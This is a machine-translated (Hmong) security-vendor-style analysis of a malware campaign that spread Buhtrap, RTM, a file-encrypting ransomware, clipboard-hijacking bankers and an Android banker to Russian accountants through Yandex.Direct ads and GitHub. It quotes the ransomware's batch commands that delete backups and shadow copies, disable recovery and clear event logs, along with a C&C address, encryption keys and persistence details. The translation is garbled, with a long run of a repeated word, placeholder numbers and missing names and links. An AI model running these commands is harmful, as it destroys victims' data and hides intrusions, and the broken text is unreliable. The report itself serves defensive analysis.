Txhawm rau tsom mus rau tus accountants hauv kev tawm tsam cyber, koj tuaj yeem siv cov ntaub ntawv ua haujlwm uas lawv tshawb hauv online. Qhov no yog kwv yees li cas ib pab pawg cyber tau ua nyob rau ob peb lub hlis dhau los, faib cov paub rov qab. ΠΈ , nrog rau cov encryptors thiab software rau nyiag cryptocurrencies. Feem ntau cov hom phiaj yog nyob rau hauv Russia. Qhov kev tawm tsam tau ua los ntawm kev tso siab phem tshaj tawm ntawm Yandex.Direct. Cov neeg raug tsim txom tau raug coj mus rau lub vev xaib uas lawv raug thov kom rub tawm cov ntaub ntawv tsis zoo uas tau zais ua cov qauv ntawv. Yandex tshem tawm kev tshaj tawm tsis zoo tom qab peb ceeb toom.
Buhtrap qhov chaws tau tawm hauv online yav dhau los yog li leej twg tuaj yeem siv nws. Peb tsis muaj ntaub ntawv hais txog RTM code muaj.
Hauv cov ntawv tshaj tawm no peb yuav qhia koj li cas cov neeg tawm tsam faib malware siv Yandex.Direct thiab tuav nws ntawm GitHub. Cov ntawv tshaj tawm yuav xaus nrog kev tshuaj ntsuam xyuas ntawm tus malware.
Buhtrap thiab RTM rov qab ua lag luam
Mechanism ntawm kev sib kis thiab cov neeg raug tsim txom
Ntau yam payloads xa mus rau cov neeg raug tsim txom sib koom ib qho kev nthuav tawm mechanism. Tag nrho cov ntaub ntawv phem tsim los ntawm cov neeg tawm tsam tau muab tso rau hauv ob qhov sib txawv GitHub repositories.
Feem ntau, lub chaw cia khoom muaj ib cov ntaub ntawv tsis zoo downloadable, uas hloov nquag. Txij li thaum GitHub tso cai rau koj los saib keeb kwm ntawm kev hloov pauv rau lub chaw cia khoom, peb tuaj yeem pom dab tsi malware tau muab faib rau qee lub sijhawm. Txhawm rau kom tus neeg raug tsim txom rub tawm cov ntaub ntawv tsis zoo, lub vev xaib blanki-shabloni24[.]ru, tau pom hauv daim duab saum toj no, tau siv.
Kev tsim ntawm lub xaib thiab tag nrho cov npe ntawm cov ntaub ntawv tsis zoo ua raws li ib lub tswv yim - cov ntawv, cov qauv, cov ntawv cog lus, cov qauv, thiab lwm yam. Xav txog tias Buhtrap thiab RTM software twb tau siv rau hauv kev tawm tsam ntawm tus accountants yav dhau los, peb xav tias cov lub tswv yim hauv kev sib tw tshiab yog tib yam. Cov lus nug tsuas yog yuav ua li cas tus neeg raug tsim txom tau mus rau qhov chaw tawm tsam.
Kab mob
Tsawg kawg yog ob peb tus neeg raug tsim txom uas tau xaus rau ntawm qhov chaw no tau nyiam los ntawm kev tshaj tawm tsis zoo. Hauv qab no yog ib qho piv txwv URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Raws li koj tuaj yeem pom los ntawm qhov txuas, tus chij tau muab tso rau ntawm lub rooj sib tham raug cai accounting bb.f2[.]kz. Nws yog ib qho tseem ceeb uas yuav tsum nco ntsoov tias cov banners tau tshwm sim nyob rau hauv ntau qhov chaw, txhua tus muaj tib lub phiaj xwm id (blanki_rsya), thiab feem ntau cuam tshuam nrog kev pabcuam nyiaj txiag lossis kev pabcuam kev cai lij choj. Qhov URL qhia tau hais tias tus neeg raug tsim txom siv qhov kev thov "download invoice form," uas txhawb peb qhov kev xav ntawm kev tawm tsam. Hauv qab no yog cov chaw uas cov banners tau tshwm sim thiab cov lus nug sib txuas.
- download invoice form β bb.f2[.]kz
- qauv cog lus - Ipopen[.]ru
- daim ntawv thov kev tsis txaus siab qauv - 77metrov[.]ru
- daim ntawv cog lus - blank-dogovor-kupli-prodazhi[.]ru
- qauv tsev hais plaub thov - zen.yandex[.]ru
- qauv tsis txaus siab - yurday[.]ru
- qauv daim ntawv cog lus - Regforum[.]ru
- daim ntawv cog lus β assistentus[.]ru
- qauv kev pom zoo - napravah[.]com
- cov qauv ntawm cov ntawv cog lus raug cai - avito[.]ru
Lub site blanki-shabloni24[.]ru tej zaum yuav tau teeb tsa kom dhau qhov kev ntsuam xyuas pom yooj yim. Feem ntau, ib qho kev tshaj tawm uas taw qhia rau qhov chaw saib xyuas kev tshaj lij nrog qhov txuas mus rau GitHub tsis zoo li qee yam tsis zoo. Tsis tas li ntawd, cov neeg tawm tsam tau xa cov ntaub ntawv tsis zoo rau lub chaw cia khoom tsuas yog rau lub sijhawm txwv, zoo li thaum lub sijhawm sib tw. Feem ntau, GitHub qhov chaw khaws cia muaj qhov khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob khoob. Yog li, cov neeg tawm tsam tuaj yeem faib kev tshaj tawm los ntawm Yandex.Direct ntawm cov vev xaib uas feem ntau yuav tuaj xyuas los ntawm tus accountants uas tuaj teb rau cov lus nug tshwj xeeb.
Tom ntej no, cia peb saib ntau yam payloads faib ua li no.
Payload Analysis
Chronology ntawm kev faib tawm
Cov phiaj xwm phem tau pib thaum kawg lub Kaum Hli 2018 thiab ua haujlwm thaum lub sijhawm sau ntawv. Txij li thaum tag nrho cov chaw cia khoom tau tshaj tawm rau pej xeem ntawm GitHub, peb tau sau cov sijhawm raug cai ntawm kev faib tawm rau XNUMX tsev neeg malware sib txawv (saib daim duab hauv qab). Peb tau ntxiv ib kab uas qhia thaum pom qhov txuas banner, raws li ntsuas los ntawm ESET telemetry, rau kev sib piv nrog git keeb kwm. Raws li koj tuaj yeem pom, qhov no cuam tshuam zoo nrog qhov muaj ntawm cov nyiaj them poob haujlwm ntawm GitHub. Qhov tsis sib xws thaum kawg ntawm Lub Ob Hlis tuaj yeem piav qhia los ntawm qhov tseeb tias peb tsis muaj ib feem ntawm kev hloov pauv keeb kwm vim tias lub chaw cia khoom raug tshem tawm ntawm GitHub ua ntej peb tuaj yeem tau txais tag nrho.
Daim duab 1. Chronology ntawm malware faib.
Daim Ntawv Pov Thawj Kos Npe
Kev sib tw siv ntau daim ntawv pov thawj. Qee tus tau kos npe los ntawm ntau dua ib tsev neeg malware, uas qhia ntxiv tias cov qauv sib txawv tau koom nrog tib lub phiaj xwm. Txawm hais tias muaj tus yuam sij ntiag tug, cov neeg ua haujlwm tsis tau kos npe rau binaries thiab tsis siv tus yuam sij rau tag nrho cov qauv. Thaum lub Ob Hlis lig 2019, cov neeg tawm tsam tau pib tsim cov ntawv kos npe tsis raug siv daim ntawv pov thawj Google uas lawv tsis muaj tus yuam sij ntiag tug.
Txhua daim ntawv pov thawj koom nrog hauv kev sib tw thiab cov tsev neeg malware uas lawv kos npe tau teev nyob rau hauv cov lus hauv qab no.
Peb kuj tau siv cov cai kos npe daim ntawv pov thawj los tsim kev sib txuas nrog lwm tsev neeg malware. Rau feem ntau daim ntawv pov thawj, peb tsis pom cov qauv uas tsis tau muab faib los ntawm GitHub repository. Txawm li cas los xij, daim ntawv pov thawj TOV "MARIYA" tau siv los kos npe rau malware uas yog botnet , adware thiab miners. Nws tsis zoo li qhov malware no cuam tshuam nrog kev sib tw no. Feem ntau yuav, daim ntawv pov thawj tau yuav ntawm qhov tsaus ntuj.
Win32/Filecoder.Buhtrap
Thawj feem uas ntes tau peb cov xim yog qhov tshiab nrhiav tau Win32/Filecoder.Buhtrap. Nov yog Delphi cov ntaub ntawv binary uas qee zaum ntim. Nws tau tshaj tawm thaum Lub Ob Hlis-Lub Peb Hlis 2019. Nws coj li befits ransomware program - nws tshawb nrhiav cov drives hauv zos thiab network folders thiab encrypts cov ntaub ntawv tshawb pom. Nws tsis xav tau kev sib txuas hauv Is Taws Nem kom muaj kev cuam tshuam vim nws tsis tiv tauj lub server kom xa cov yuam sij encryption. Hloov chaw, nws ntxiv "token" rau qhov kawg ntawm cov lus nqe txhiv, thiab qhia tias siv email lossis Bitmessage hu rau cov tswv lag luam.
Txhawm rau encrypt ntau cov peev txheej rhiab ntau npaum li qhov ua tau, Filecoder.Buhtrap sau cov xov tsim los kaw cov software tseem ceeb uas yuav muaj cov neeg tuav ntaub ntawv qhib uas muaj cov ntaub ntawv tseem ceeb uas tuaj yeem cuam tshuam nrog encryption. Cov txheej txheem lub hom phiaj yog qhov tseem ceeb ntawm kev tswj hwm kev tswj hwm kev tswj hwm (DBMS). Tsis tas li ntawd, Filecoder.Buhtrap tshem tawm cov ntaub ntawv teev tseg thiab cov thaub qab ua kom cov ntaub ntawv rov qab nyuaj. Txhawm rau ua qhov no, khiav cov ntawv batch hauv qab no.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap siv qhov kev pabcuam raug cai hauv online IP Logger tsim los sau cov ntaub ntawv hais txog cov neeg tuaj xyuas lub vev xaib. Qhov no yog npaj los taug qab cov neeg raug tsim txom ntawm ransomware, uas yog lub luag haujlwm ntawm kab hais kom ua:
mshta.exe "javascript:document.write('');"
Cov ntaub ntawv rau encryption raug xaiv yog tias lawv tsis phim peb cov npe cais tawm. Ua ntej, cov ntaub ntawv nrog cov txuas ntxiv hauv qab no tsis tau encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys thiab .bat. Qhov thib ob, tag nrho cov ntaub ntawv uas tag nrho txoj hauv kev muaj cov kab ntawv teev npe los ntawm cov npe hauv qab no raug cais tawm.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Thib peb, qee cov npe ntawm cov ntaub ntawv tseem raug cais tawm ntawm kev nkag mus, ntawm lawv cov ntaub ntawv npe ntawm cov lus nqe txhiv. Cov npe tau nthuav tawm hauv qab no. Obviously, tag nrho cov kev zam no yog npaj los ua kom lub tshuab khiav, tab sis nrog kev tsim nyog tsawg kawg nkaus.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Cov ntaub ntawv encryption tswvyim
Thaum ua tiav, cov malware tsim 512-ntsis RSA tus khub tseem ceeb. Tus exponent (d) thiab modulus (n) yog tom qab ntawd encrypted nrog hard-coded 2048-ntsis public key (public exponent and modulus), zlib-packed, and base64 encoded. Lub luag haujlwm rau qhov no yog qhia hauv daim duab 2.
Daim duab 2. Qhov tshwm sim ntawm Hex-Rays decompilation ntawm 512-ntsis RSA tseem ceeb khub txheej txheem.
Hauv qab no yog ib qho piv txwv ntawm cov ntawv dawb nrog ib tus yuam sij tsim tawm, uas yog ib qho token txuas nrog cov lus nqe txhiv.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Tus neeg tua neeg tus yuam sij pej xeem tau muab hauv qab no.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Cov ntaub ntawv raug encrypted siv AES-128-CBC nrog 256-ntsis yuam sij. Rau txhua cov ntaub ntawv encrypted, tus yuam sij tshiab thiab tus vector pib tshiab raug tsim tawm. Cov ntaub ntawv tseem ceeb yog ntxiv rau qhov kawg ntawm cov ntaub ntawv encrypted. Cia peb xav txog hom ntawv ntawm cov ntaub ntawv encrypted.
Cov ntaub ntawv encrypted muaj cov hauv qab no header:
Cov ntaub ntawv hauv paus nrog qhov sib ntxiv ntawm VEGA khawv koob tus nqi yog encrypted rau thawj 0x5000 bytes. Tag nrho cov ntaub ntawv decryption txuas nrog rau cov ntaub ntawv nrog cov qauv hauv qab no:
- Cov ntaub ntawv me me muaj cov cim qhia seb cov ntaub ntawv loj dua 0x5000 bytes loj
β AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key khub))
- RSA key blob = ZlibCompress(RSAEncrypt(tsim RSA tus yuam sij, nyuaj-coded RSA pej xeem tus yuam sij))
Win32/ClipBanker
Win32/ClipBanker yog ib feem uas tau muab faib ua ntu zus txij lub Kaum Hli mus txog rau lub Kaum Ob Hlis 2018. Nws lub luag haujlwm yog los saib xyuas cov ntsiab lus ntawm cov ntawv teev cia, nws nrhiav chaw nyob ntawm cov hnab nyiaj cryptocurrency. Tom qab txiav txim siab lub hom phiaj lub hnab nyiaj qhov chaw nyob, ClipBanker hloov nws nrog qhov chaw nyob ntseeg tias yog tus tswv. Cov qauv peb kuaj tsis yog lub thawv lossis obfuscated. Tib lub tshuab siv los npog tus cwj pwm yog txoj hlua encryption. Tus neeg teb xov tooj chaw nyob yog encrypted siv RC4. Lub hom phiaj cryptocurrencies yog Bitcoin, Bitcoin nyiaj ntsuab, Dogecoin, Ethereum thiab Ripple.
Thaum lub sijhawm cov malware tau kis mus rau cov neeg tawm tsam 'Bitcoin hnab nyiaj, ib qho me me raug xa mus rau VTS, uas ua rau tsis ntseeg txog qhov ua tiav ntawm kev sib tw. Tsis tas li ntawd, tsis muaj pov thawj los qhia tias cov kev hloov pauv no cuam tshuam nrog ClipBanker txhua.
Win32/RTM
Win32 / RTM feem tau faib rau ob peb hnub thaum ntxov Lub Peb Hlis 2019. RTM yog Trojan banker sau nyob rau hauv Delphi, tsom rau tej thaj chaw deb banking systems. Hauv 2017, ESET cov kws tshawb fawb luam tawm ntawm qhov program no, cov lus piav qhia tseem cuam tshuam. Thaum Lub Ib Hlis 2019, Palo Alto Networks kuj tau tso tawm .
Buhtrap Loader
Rau qee lub sijhawm, tus downloader muaj nyob ntawm GitHub uas tsis zoo ib yam li cov cuab yeej Buhtrap yav dhau los. Nws tig mus https://94.100.18[.]67/RSS.php?<some_id> kom tau mus rau theem tom ntej thiab thauj nws ncaj qha rau hauv nco. Peb tuaj yeem paub qhov txawv ntawm ob tus cwj pwm ntawm tus lej thib ob. Nyob rau hauv thawj URL, RSS.php dhau lub Buhtrap backdoor ncaj qha - qhov backdoor no zoo ib yam li cov muaj tom qab qhov chaws tau leaked.
Qhov zoo siab, peb pom ntau qhov kev sib tw nrog Buhtrap backdoor, thiab lawv raug liam tias khiav los ntawm cov neeg ua haujlwm sib txawv. Hauv qhov no, qhov sib txawv tseem ceeb yog qhov backdoor yog loaded ncaj qha mus rau hauv lub cim xeeb thiab tsis siv cov txheej txheem ib txwm muaj nrog rau cov txheej txheem xa tawm DLL uas peb tau tham txog. . Tsis tas li ntawd, cov neeg ua haujlwm tau hloov pauv tus yuam sij RC4 siv los encrypt network tsheb mus rau C&C server. Hauv feem ntau ntawm cov phiaj xwm peb tau pom, cov neeg ua haujlwm tsis thab hloov tus yuam sij no.
Qhov thib ob, tus cwj pwm nyuaj dua yog tias RSS.php URL raug xa mus rau lwm tus loader. Nws tau siv qee qhov tsis txaus ntseeg, xws li rov tsim kho lub rooj dynamic ntshuam. Lub hom phiaj ntawm bootloader yog hu rau C&C server [.]com/api/F27F84EDA4D13B15/2, xa cov cav thiab tos kom teb. Nws ua cov lus teb raws li blob, thauj nws mus rau hauv lub cim xeeb thiab ua tiav nws. Lub payload peb pom ua tiav lub loader no tib yam Buhtrap backdoor, tab sis tej zaum yuav muaj lwm yam.
Android/Spy.Banker
Interestingly, ib feem rau Android kuj pom nyob rau hauv GitHub repository. Nws nyob hauv ceg tseem ceeb tsuas yog ib hnub xwb - Kaum Ib Hlis 1, 2018. Sib nrug los ntawm kev tshaj tawm ntawm GitHub, ESET telemetry pom tsis muaj pov thawj ntawm cov malware no tau muab faib.
Cov tivthaiv tau tuav raws li Android Application Package (APK). Nws yog obfuscated hnyav heev. Tus cwj pwm phem tau muab zais rau hauv JAR encrypted nyob hauv APK. Nws yog encrypted nrog RC4 siv tus yuam sij no:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Tib tus yuam sij thiab algorithm yog siv los encrypt cov hlua. JAR yog nyob rau hauv APK_ROOT + image/files. Thawj 4 bytes ntawm cov ntaub ntawv muaj qhov ntev ntawm JAR encrypted, uas pib tam sim ntawd tom qab qhov ntev.
Thaum decrypted cov ntaub ntawv, peb pom tias nws yog Anubis - yav dhau los banker rau Android. Lub malware muaj cov yam ntxwv hauv qab no:
- microphone kaw
- coj screenshots
- tau txais GPS coordinates
- keylogger
- ntaus ntawv cov ntaub ntawv encryption thiab ransom thov
- xa spam
Interestingly, tus banker siv Twitter ua ib tug backup kev sib txuas lus channel kom tau txais lwm C&C server. Cov qauv peb tau txheeb xyuas siv tus account @JonesTrader, tab sis thaum lub sijhawm tshuaj ntsuam nws twb tau thaiv lawm.
Tus banker muaj ib daim ntawv teev cov hom phiaj daim ntawv thov ntawm lub Android ntaus ntawv. Nws ntev dua li cov npe tau txais hauv Sophos txoj kev kawm. Daim ntawv teev npe suav nrog ntau daim ntawv thov nyiaj hauv tuam txhab, kev lag luam online xws li Amazon thiab eBay, thiab cov kev pabcuam cryptocurrency.
MSIL/ClipBanker.IH
Cov khoom kawg uas tau muab faib ua ib feem ntawm qhov kev sib tw no yog .NET Windows executable, uas tau tshwm sim rau lub Peb Hlis 2019. Feem ntau ntawm cov versions kawm tau ntim nrog ConfuserEx v1.0.0. Zoo li ClipBanker, cov khoom siv no siv cov ntawv teev cia. Nws lub hom phiaj yog ntau yam ntawm cryptocurrencies, nrog rau kev muab ntawm Chav. Tsis tas li ntawd, nws siv qhov kev pabcuam IP Logger los nyiag Bitcoin ntiag tug WIF tus yuam sij.
Mechanisms tiv thaiv
Ntxiv rau cov txiaj ntsig uas ConfuserEx muab rau hauv kev tiv thaiv kev debugging, pov tseg, thiab cuam tshuam, cov khoom siv suav nrog lub peev xwm los kuaj xyuas cov khoom tiv thaiv kab mob thiab cov tshuab virtual.
Txhawm rau kom paub tseeb tias nws khiav hauv lub tshuab virtual, cov malware siv cov kab hauv Windows WMI (WMIC) los thov cov ntaub ntawv BIOS, uas yog:
wmic bios
Tom qab ntawd qhov kev zov me nyuam cais cov lus txib tso tawm thiab nrhiav cov ntsiab lus: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Txhawm rau txheeb xyuas cov khoom siv tshuaj tiv thaiv kab mob, malware xa Windows Management Instrumentation (WMI) thov rau Windows Security Center siv ManagementObjectSearcher API raws li qhia hauv qab no. Tom qab txiav txim siab los ntawm base64 hu zoo li no:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Daim duab 3. txheej txheem los txheeb xyuas cov khoom siv tshuaj tiv thaiv kab mob.
Tsis tas li ntawd, cov malware kuaj seb puas , ib qho cuab yeej los tiv thaiv kev tawm tsam ntawm cov ntawv teev cia thiab, yog tias khiav, tshem tawm tag nrho cov xov hauv cov txheej txheem ntawd, yog li cuam tshuam kev tiv thaiv.
Kev ua siab ntev
Lub version ntawm malware peb kawm luam nws tus kheej rau hauv %APPDATA%googleupdater.exe thiab teeb tsa tus cwj pwm "pob ntseg" rau google directory. Ces nws hloov tus nqi SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell hauv Windows sau npe thiab ntxiv txoj hauv kev updater.exe. Txoj kev no, cov malware yuav raug tua txhua zaus uas tus neeg siv nkag mus.
tus cwj pwm phem
Zoo li ClipBanker, cov malware saib xyuas cov ntsiab lus ntawm daim ntawv teev lus thiab saib rau qhov chaw nyob hauv lub hnab nyiaj cryptocurrency, thiab thaum pom, hloov nws nrog ib qho ntawm tus neeg teb xov tooj chaw nyob. Hauv qab no yog cov npe ntawm lub hom phiaj chaw nyob raws li qhov pom hauv cov cai.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Rau txhua hom chaw nyob muaj ib qho kev qhia tsis tu ncua. Tus nqi STEAM_URL yog siv los tawm tsam Steam system, raws li tuaj yeem pom los ntawm cov lus qhia tsis tu ncua uas siv los txhais hauv qhov tsis:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration channel
Ntxiv rau qhov hloov chaw nyob hauv qhov tsis, cov malware tsom rau tus kheej WIF yuam sij ntawm Bitcoin, Bitcoin Core thiab Electrum Bitcoin hnab nyiaj. Qhov kev zov me nyuam siv plogger.org ua ib qho kev tawm tsam kom tau txais WIF tus yuam sij ntiag tug. Txhawm rau ua qhov no, cov neeg ua haujlwm ntxiv cov ntaub ntawv ntiag tug rau tus neeg siv-Agent HTTP header, raws li qhia hauv qab no.
Daim duab 4. IP Logger console nrog cov ntaub ntawv tso tawm.
Cov neeg ua haujlwm tsis tau siv iplogger.org los tshem tawm cov hnab nyiaj. Tej zaum lawv tau siv txoj kev sib txawv vim yog 255 tus cwj pwm txwv hauv thaj teb User-Agenttso tawm kom pom hauv IP Logger web interface. Hauv cov qauv peb tau kawm, lwm qhov tso zis server tau muab khaws cia rau hauv ib puag ncig hloov pauv DiscordWebHook. Kuj ceeb tias, qhov kev hloov pauv ib puag ncig no tsis raug muab rau txhua qhov chaw hauv cov cai. Qhov no qhia tau hais tias tus malware tseem tab tom txhim kho thiab qhov hloov pauv tau raug xa mus rau tus neeg teb xov tooj lub tshuab sim.
Muaj lwm qhov kos npe tias qhov kev zov me nyuam tab tom txhim kho. Cov ntaub ntawv binary suav nrog ob lub iplogger.org URLs, thiab ob qho tib si raug nug thaum cov ntaub ntawv raug tshem tawm. Hauv kev thov mus rau ib qho ntawm cov URLs no, tus nqi hauv qhov chaw xa mus yog ua ntej los ntawm "DEV /". Peb kuj pom ib qho version uas tsis tau ntim khoom siv ConfuserEx, tus neeg txais rau qhov URL no yog hu ua DevFeedbackUrl. Raws li ib puag ncig hloov pauv lub npe, peb ntseeg tias cov neeg ua haujlwm tau npaj siv cov kev pabcuam raug cai Discord thiab nws lub vev xaib cuam tshuam los nyiag cov hnab nyiaj cryptocurrency.
xaus
Cov phiaj xwm no yog ib qho piv txwv ntawm kev siv cov kev pabcuam tshaj tawm raug cai hauv kev tawm tsam cyber. Cov phiaj xwm tsom rau cov koom haum Lavxias, tab sis peb yuav tsis xav tsis thoob thaum pom qhov kev tawm tsam no siv cov kev pabcuam uas tsis yog Lavxias. Txhawm rau kom tsis txhob muaj kev cuam tshuam, cov neeg siv yuav tsum muaj kev ntseeg siab rau lub koob npe nrov ntawm qhov chaw ntawm cov software uas lawv rub tawm.
Ib daim ntawv teev tag nrho ntawm cov ntsuas kev sib haum xeeb thiab MITER ATT&CK tus cwj pwm muaj nyob ntawm .
Tau qhov twg los: www.hab.com